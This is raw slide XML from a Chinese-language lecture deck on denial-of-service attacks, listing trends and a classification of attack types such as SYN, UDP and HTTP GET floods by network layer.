                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-〉1G</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甚至更高</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10K  pps--〉100K  pps -〉1M  pps</a:t>
            </a:r>
            <a:endPar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endParaRP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技术</a:t>
            </a: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真实</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP</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地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-〉IP</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欺骗技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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单一攻击源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-〉</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多个攻击源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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简单协议承载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-〉</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复杂协议承载</a:t>
            </a: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智能化，试图绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IDS</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或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FW</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DRDoS/ACK Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zombie Net/BOTNET</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Proxy Connection Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS Flood</a:t>
            </a:r>
            <a:endPar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cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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图片 3" descr="1.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1EC252C-6C75-4A15-858D-F51A588B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3525" y="160338"/>
            <a:ext cx="1990725"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19" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85A2C438-525A-4281-9C5B-CBC73C2C2630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DoS攻击的本质</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188420" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1F358D-6FD4-41DF-B5A2-4765B78994EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2851150"/>
            <a:ext cx="7620000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用木桶原理，寻找并利用系统应用的瓶颈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>阻塞和耗尽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当前的问题：用户的带宽小于攻击的规模，造成访问带宽成为木桶的短板</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67C22950-B285-425F-84DD-B632ADFEA216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>DoS/DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:sym typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>类型的划分</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189443" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34C4E118-58A5-49A5-91CC-6CD8973B9892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4835525" y="2273300"/>
            <a:ext cx="3930650" cy="4237038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="D9D9D9"/>
              </a:gs>
              <a:gs pos="71999">
                <a:srgbClr val="898989"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="6D6D6D"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="10000">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="174625" indent="-174625">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应用层</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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Osaka" charset="-128"/>
              </a:rPr>
              <a:t>垃圾邮件、病毒邮件</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DNS Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Osaka" charset="-128"/>
            </a:endParaRP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网络层</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SYN Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Osaka" charset="-128"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Osaka" charset="-128"/>
              </a:rPr>
              <a:t>ICMP Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Osaka" charset="-128"/>
            </a:endParaRP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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Osaka" charset="-128"/>
              </a:rPr>
              <a:t>伪造</a:t>
            </a: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链路层</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ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Osaka" charset="-128"/>
              </a:rPr>
              <a:t>伪造报文</a:t>
            </a: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物理层</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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Osaka" charset="-128"/>
              </a:rPr>
              <a:t>直接线路破坏</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zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Osaka" charset="-128"/>
              </a:rPr>
              <a:t>电磁干扰</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189444" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{501CE205-BE28-46B5-9BC1-4E5F7F8E31C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4578350" y="1701800"/>
            <a:ext cx="0" cy="4991100"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="006666"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>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89445" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7F9531-5F07-4BC8-84B2-F0A53F0FBD2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4781550" y="1700213"/>
            <a:ext cx="4049713" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C3986D"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="800000"/>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1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击类型划分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>II</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189446" name="Rectangle 6" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4271C1A4-08A0-440D-A48D-7A89843DAFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="368300" y="2274888"/>
            <a:ext cx="3929063" cy="4237037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="EEE6DA"/>
              </a:gs>
              <a:gs pos="71999">
                <a:srgbClr val="CBBD97"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="C4B182"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="10000">
            <a:solidFill>
              <a:srgbClr val="A19574"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="174625" indent="-174625">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堆栈突破型（利用主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a: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设备漏洞）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18"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远程溢出拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="50000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网络流量型（利用网络通讯协议）</a:t>
            </a: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SYN Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Osaka" charset="-128"/>
            </a:endParaRP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ACK Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Osaka" charset="-128"/>
            </a:endParaRP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ICMP Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Osaka" charset="-128"/>
            </a:endParaRP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UDP Flood、UDP DNS Query Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Osaka" charset="-128"/>
            </a:endParaRP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Connection Flood</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Osaka" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="80000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4D4D4D"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Osaka" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Get Flood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189447" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08830761-6487-4359-94FF-BEE078F9C62D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="314325" y="1701800"/>
            <a:ext cx="4049713" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C3986D"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="800000"/>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1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
